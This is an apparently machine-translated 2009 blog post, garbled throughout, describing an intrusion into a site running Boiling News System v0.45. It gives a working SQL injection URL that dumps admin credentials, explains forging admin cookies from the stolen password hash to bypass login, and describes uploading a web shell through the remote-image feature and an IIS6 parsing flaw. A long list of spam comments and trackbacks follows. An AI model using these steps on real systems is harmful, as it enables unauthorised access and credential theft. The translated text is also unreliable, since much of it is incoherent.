RSS

끓는 뉴스 시스템 v0.45은 셸를 얻으려고

이 항목은 2009년 9월 25일에 게재되었습니다

: St0p
복제하면 소스를 지정해주십시오 : http://www.st0p.org

참고 : 구멍을 채우기 위해 대상 스테이션 관리자에게 생각나게합니다.

아무런 자료가 경찰서로 보내지지 그룹을 참조 오픈 뉴스 시스템을 끓여야 같았지만, 서면 버전은 V0.1입니다, 인터넷에서 해당 버전을 찾지 못했습니다, 1.1과 0.45 두 가지 버전이 있으며, 기억 주입 News.asp 실제로 존재하지만, 때문에 다른 버전, 그래서 뉴스 테이블 필드의 모든 문장은 약간 다릅니다.

st0p의 시도 후, 목적지 스테이션 배경 사용자 이름과 암호에 다음 문장을 통해 해쉬 성공 0.45이어야합니다, 저는 27 필드 성공을 했어요. . 

 

  http://st0p.org/News.asp?click=1&shu=20 % 2백1% 20as %의 20NewsID, 사용자 이름 % 20as %의 20title, 3% 20as %의 20updatetime, passwd % 20as % 20click, 5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 %의 20from의 %의 20admin % 20 %의 20order의 % 20by % 202퍼센트 20desc의 %의 20union의 %의 20select의 % 20top % 202

boiling-news-system-v0-45-take-shell1

봐, 우리가 사용자 이름 xcb 비밀 번호 c95ca278a74775f8를 못하고 우리가 찾아내는, 우울, MD5 크랙 갔는데, 풀려날 수 없어요, 앞으로 올 수있는 배경을 입력하지 마십시오. . .
그러면 내가 코드의 0.45 버전을 확인하고 관리자 / chkuser.asp의 부분이 사용자 로그인의 유효성을 검사 발견, 우리는 코드를보고 

 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22

 ( Request . cookies ( "KEY" ) = "super" or Request . cookies ( "KEY" ) = "check" or Request . cookies ( "KEY" ) = "typemaster" or Request . cookies ( "KEY" ) = "bigmaster" or Request . cookies ( "KEY" ) = "smallmaster" or Request . cookies ( "KEY" ) = "selfreg" ) THEN '首先检测cookies中的key,如果不为上面的值,自动转向登陆页面 response . redirect "login.asp" response . end END IF set urs = server . createobject ( "adodb.recordset" ) sql = "select * from admin where username='" & Request. cookies ( "username" ) & "'" '查询cookies中username是否是管理用户 urs. open sql,conn, 1 , 3 if urs. bof or urs. eof then response . redirect "login.asp" response . end end if IF Request . cookies ( "passwd" ) <> urs ( "passwd" ) THEN '如果用户存在,验诈cookies中的passwd字段是否和用户的密码HASH相同,不同则转向 response . redirect "login.asp" response . end END IF urs. close set urs = nothing %> <% IF하지 않음 (Request. 쿠키 ( "키") = "수퍼"또는 요청합니다. 쿠키 ( "키") = "확인"또는 요청합니다. 쿠키 ( "키") = "typemaster"또는 요청합니다. 쿠키 ( "키 ") ="bigmaster "또는 요청합니다. 쿠키 ("키 ") ="smallmaster "또는 요청합니다. 쿠키 ("키 ") ="selfreg가 "), 이름이 자동으로 위의 값으로 쿠키 키를 감지 못하면 방문 페이지로 설정은 "login.asp"응답을 리디렉션의 반응이다. 최종 끝은 세트 Urs는가 = 서버. CreateObject를 ( "adodb.recordset") SQL = IF "관리자에서 선택 * 어디에 사용자 이름 = '"& 요청 쿠키 (이하 "사용자 이름") & " '"'문의 쿠키 사용자 이름은 관리 사용자 Urs는. 오픈 SQL, conn, 1, 3 Urs는. bof 또는 Urs는. EOF 경우 다음과 대응. "login.asp"응답 엔드 엔드를 리디렉션 요청합니다. 쿠키가 만일 여부 ( "passwd") <> Urs는 (경우 사용자가 존재하는 경우 passwd 현장 체험 사기 쿠키, '그리고) "passwd"응답에 사용자의 암호 해시 여러 차례. "login.asp"응답을 리디렉션하는 경우. 최종 END Urs는. 세트 Urs는 =의 아무것 %를 닫습니다>

야, 정말 행운, 그건 암호 해시를 해독하는 것은 불가능하지만, 비록 당신이 속임수를 실현하는 데 사용할 수 있습니다. 프로세스의 사용을 좀 봐. .
그는 login.asp로 이동합니다 때 우리는 도메인을 오픈 http://st0p.org/admin/index.asp를 사용하여

boiling-news-system-v0-45-take-shell2

그리고 우리는 쿠키를 reglevel 삭제;하면 FullName, 범위, 키, 사용자 이름 부분은 다음 사용자 이름 추가 = xcb; KEY = 수퍼; passwd = c95ca278a74775f8, 사용자 이름 및 암호 교체가 키를 직접 슈퍼를 사용할 수 있습니다.
우리는 수정 지적

boiling-news-system-v0-45-take-shell3

그리고 URL이 http://st0p.org/admin/index.asp 포인트 링크를 변경되었습니다 변경

boiling-news-system-v0-45-take-shell4

배경에 성공 항목, 이봐, 우리의 권리를 언급하는 직접,이 시스템은 원격 사진을 저장하는 기능을 가지고, 우리는 서버에 플러그인 사진 편집기, 주소 그리고 와서 우선 셸를 수집, 기사를 추가하고하는 데 사용 말, 삽입, 저장 원격 이미지를 선택합니다. 그리고 제출

boiling-news-system-v0-45-take-shell5

그렇다면 우리는 내부 주소의 사진을 복사, 좋은 기사를 추가할 권한이 필요합니다. 타겟 스테이션의 서버가 IIS6입니다 전항에도 파싱 취약점을보고, 그냥 사용 hehe되지 않습니다.
우리는 지금 조랑말의 단어를 가지고 있고, 난 왜 말을하지 않습니다. . .
그러나, 대상 스테이션의 권한만을 업로드 디렉토리에 쓰기 꽤 BT이지만, 또한 삭제할 수 없습니다. . 약 거기에 천천히 권리, 첫 번째 레코드. . .

, , , , ,
· 무술 요령 알아보기
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


153 응답은 "쉘을 얻을 뉴스 시스템에게 v0.45 끓여야

  1. 에 의한 Minghacker2009년 9월 26일 | 답장

    다니엘 st0p ~ ~ ~ ~ 예배


  2. icysun 의한 2009년 9월 26일 | 답장

    아니라 시스템 ..

    이 세계 개새끼 환경의 채권 ..

    st0p는 회신 :
    오후 12시 21분시 2009년 9월 26일

    당신은 내가 지금 뭐하고 있는건가라고?
    뉴스 시스템의 끓는 및 0.45,

    icysun는 회신 :
    오후 12시 반시 2009년 9월 26일


  3. b00lean 의한 2009년 9월 28일 | 답장

    st0p 젖소는 우리 학교가 아닌 얼마나 가지 말라고


  4. 이용 jshfuitg2009년 11월 25일 | 답장

    dCATec qhuvtpiheyue , [URL = http://ggwyligshlfd.com/ ggwyligshlfd [/ URL], [링크 = http://nxjhtastnpxn.com/] nxjhtastnpxn [/ 링크] http://kwxzxruczflr.com/


  5. 이용 adkpaxv2009년 11월 27일 | 답장

    T9v9E0 oihbhcyxrstd , [URL = http://ztggdtdbkkjc.com/ ztggdtdbkkjc [/ URL], [링크 = http://haboolnldgjd.com/] haboolnldgjd [/ 링크] http://zsjtcxcsvmjj.com/


  6. 에 의한 Seengart2009년 12월 14일 | 답장

    어 .. 이런 생각을 주셔서 감사합니다 :) )


  7. FarmerLupe33 의한 2011년 11월 4일 | 답장

    대출은 자신의 경력을 시작하고자하는 사람들에게 유용하다는 것을, 보인다. 사실로서, 그 상업 대출을받을 수 있는거 잖아.


  1. 144 트랙백 (들)

  2. 2009년 10월 7일 : 예 환경 그래픽 시스템의 채권이 취할 수있는 쉘 아이디어 - IIS6 파싱 취약점 이미지를 저장하는 원격 야 환경의 채권, 끓는, 사출,-st0p의 블로그의 취약성 채권을 업로드
  3. 2009년 10월 7일 : 예 환경 그래픽 시스템의 유대가 조개 아이디어를 받아 - 이미지, 사출, 끓는, 알마 환경의 채권이 세계 채권, 취약점 IIS6 구문 분석 취약점 - lixiaopeng 님의 블로그에 업로드를 저장하는 리모컨을
  4. 2011년 11월 5일 : IN 맥스웰 인치 서부 유럽 표준시 지하실
  5. 2011년 11월 6일 : 월급날 대출, 영국
  6. 2011년 11월 10일이 : 비전을 향상
  7. 2011년 11월 11일가 : 필리핀에서 은퇴
  8. 2011년 11월 11일 : 가격 비교
  9. 2011년 11월 11일 : Diseño 웹
  10. 2011년 11월 12일 : 무료 NFL 예상
  11. 2011년 11월 12일 : 잡히게 될 chua kefir
  12. 2011년 11월 14일 : 내 결혼 생활을 저장하는 방법
  13. 2011년 11월 14일 : 아틀란타 카펫 청소
  14. 2011년 11월 14일 : 던칸 하인즈, 쿠폰
  15. 2011년 11월 15일 : 와우 사냥꾼 가이드
  16. 2011년 11월 15일가 : vigrx 플러스, 작업을 수행
  17. 2011년 11월 16일 : 어떻게 SEO에
  18. 2011년 11월 16일 : 중부 표준시의 나무 바닥재 설치
  19. 2011년 11월 16일 : ecover 창조자
  20. 2011년 11월 16일 : 장거리 이동
  21. 2011년 11월 16일 : 마리오 게임을 플레이하기
  22. 2011년 11월 16일 : 매월 클럽의 꽃
  23. 2011년 11월 17일 : 식사 솔루션을 직접
  24. 2011년 11월 18일 : 식사 솔루션을 직접
  25. 2011년 11월 18일 : 아마존 화재
  26. 2011년 11월 19일 : 차량 대여, Ayia 나파
  27. 2011년 11월 19일 : 자유 RESERVE
  28. 2011년 11월 20일 : Frontierville
  29. 2011년 11월 20일 : 온라인 홍보
  30. 2011년 11월 21일 : roja 직접적
  31. 2011년 11월 21일 : 야즈 소송
  32. 2011년 11월 22일 : 아마존 쿠폰
  33. 2011년 11월 22일 : 제거 요청 프랑스
  34. 2011년 11월 22일 : 저렴한 잉크, 토너 카트리지
  35. 2011년 11월 23일 : 온라인 카지노 영국
  36. 2011년 11월 23일 : 화재 행렬에
  37. 2011년 11월 23일 : 시계 Greys 해부학 온라인
  38. 2011년 11월 24일 : 의료 과실 보상
  39. 2011년 11월 24일 : 신체 상해 변호사
  40. 2011년 11월 24일 : 코카인 중독
  41. 2011년 11월 28일 : 목뼈의 골절 증상
  42. 2011년 11월 29일 : tuenti
  43. 2011년 11월 29일 : 음식 동안 야영
  44. 2011년 11월 29일 : 탬파 성인 용품점
  45. 2011년 11월 30일 : 모튼,
  46. 2011년 12월 2일 : 동영상
  47. 2011년 12월 3일 : 레즈비언 포르노
  48. 2011년 12월 3일 : 용감함은 헛된 tuoi
  49. 2011년 12월 4일 : 동영상
  50. 2011년 12월 5일 : 값싼 섹스 토이
  51. 2011년 12월 6일 : 중부 표준시의 카펫 설치
  52. 2011년 12월 7일 : 건너뛰기 대여, 맨체스터
  53. 2011년 12월 13일 : mudjacking 캔사스 시티
  54. 2011년 12월 19일 : 캐리어, 부품
  55. 2011년 12월 25일는 : 페이 스북 팬 구입
  56. 2011년 12월 27일 : Dominos 쿠폰 코드
  57. 2011년 12월 28일 : 영국 로또
  58. 2011년 12월 28일 : http://www.pkv-wechsel.eu/
  59. 2011년 12월 28일 : 개인 krankenversicherung
  60. 2011년 12월 28일 : 비디오 제작, 뉴 져지 NJ
  61. 2012년 1월 7일 : 요술 장이
  62. 2012년 1월 12일 : 상해 보상
  63. 2012년 1월 13일 : 커피
  64. 2012년 1월 15일 : . 오하이오의 지하 방수, 레이몬드
  65. 2012년 1월 24일 : tanie czytanie
  66. 2012년 2월 9일 : 와우 크러셔
  67. 2012년 2월 12일 : 인치 재단 수리 오하이오의 뚱뚱한
  68. 2012년 2월 16일 : wypadanie włosów PO ciąży
  69. 2012년 2월 18일 : 선량계
  70. 2012년 2월 19일 : CH 제품 이클립스 멍에
  71. 2012년 2월 19일 : 코모, meditar
  72. 2012년 2월 20일 : 맞도록 유지하는 방법
  73. 2012년 2월 21일 : 위대한 개츠비 머리
  74. 2012년 2월 22일 : 오늘의 약속
  75. 2012년 2월 22일 : 헤어 확장
  76. 2012년 2월 23일 : 할머니를위한 선물 용품
  77. 2012년 2월 23일 : Mens 가죽 자켓
  78. 2012년 2월 23일 : 베스트 매트리스
  79. 2012년 2월 23일이 : 골드 결혼 반지를 장미
  80. 2012년 2월 24일 : FAFSA
  81. 2012년 2월 24일 : 실버는 가치 녹음
  82. 2012년 2월 26일 : , 무협가
  83. 2012년 2월 28일 : senuke X 검토
  84. 2012년 2월 29일 : Annabelle
  85. 2012년 3월 1일 : Abigael
  86. 2012년 3월 2일 : 워드 프레스 테마 2012
  87. 2012년 3월 2일 : 아미
  88. 2012년 3월 2일 : 캠핑의 세계
  89. 2012년 3월 2일 : 무선 신용 카드 기계
  90. 2012년 3월 3일 : 심령 술사
  91. 2012년 3월 5일 : 미스터 Alioune
  92. 2012년 3월 5일 : AV bedrifter를 kredittvurdering
  93. 2012년 3월 8일 : 실내복 여자의
  94. 2012년 3월 8일 : 하이킹 상점
  95. 2012년 3월 9일 : 목뼈의 골절에 대한 보상
  96. 2012년 3월 10일 : 필름 X EN 스트리밍
  97. 2012년 3월 10일 : 가구 만드는 일 오클랜드
  98. 2012년 3월 10일 : 휴일입니다
  99. 2012년 3월 10일 : 수영복
  100. 2012년 3월 10일 : 감시 장비,
  101. 2012년 3월 10일 : jop을 찾고
  102. 2012년 3월 12일 : Aissam
  103. 2012년 3월 12일 : 무료 심령 채팅
  104. 2012년 3월 13일 : 히트 펌프 NZ
  105. 2012년 3월 13일 : 게임
  106. 2012년 3월 14일 : Dachbeschichtung
  107. 2012년 3월 16일 : 점프 매뉴얼
  108. 2012년 3월 16일 : , Albin
  109. 2012년 3월 17일 : 심령 판독
  110. 2012년 3월 17일 : 앨리슨
  111. 2012년 3월 17일 : 아나리스
  112. 2012년 3월 22일 : 마네킹 남자처럼 사진
  113. 2012년 3월 22일 : 매일 우대
  114. 2012년 3월 23일 : visalus.com
  115. 2012년 3월 27일 : 골프 스윙 보조
  116. 2012년 3월 27일 : 기름진 피부를위한 스킨케어 세척
  117. 2012년 3월 27일 : 사슴이 카메라
  118. 2012년 3월 28일 : 고속 VPN
  119. 2012년 3월 28일 : 야쿠자 4
  120. 2012년 3월 29일 : 캘거리 공항 호텔
  121. 2012년 3월 29일 : 마즈다 부품
  122. 2012년 3월 30일 : 오클랜드 인치 휴식 가정
  123. 2012년 3월 31일 : 온라인 생선 가게
  124. 2012년 4월 6일 : cecy
  125. 2012년 4월 6일 : gratio
  126. 2012년 4월 6일 : mysecretglow
  127. 2012년 4월 6일 : prawo jazdy gdynia opinie
  128. 2012년 4월 6일 : zoli
  129. 2012년 4월 7일 : prawo jazdy gdynia
  130. 2012년 4월 7일 : 마술사 PVP
  131. 2012년 4월 7일 : 헌터, PVP
  132. 2012년 4월 7일 : parfüm
  133. 2012년 4월 9일 : antykwariat
  134. 2012년 4월 9일 : antykwariat
  135. 2012년 4월 10일 : gardeningrecipe
  136. 2012년 4월 10일 : toprczone
  137. 2012년 4월 12일 : 태양열
  138. 2012년 4월 18일 : 조던 레트로 1
  139. 2012년 4월 22일 : 동적 단열
  140. 2012년 4월 22일 : 로그 산장, 로치 Lomond의
  141. 2012년 4월 22일 : 저렴한 예술
  142. 2012년 4월 22일 : 휴가를위한 몰디브
  143. 2012년 4월 22일 : 마케팅 자동화
  144. 2012년 4월 22일 : 자동화 솔루션 마케팅
  145. 2012년 4월 23일 : 셔서 대리인 스코틀랜드

당신은해야 로그인 코멘트를 게시할 수 있습니다.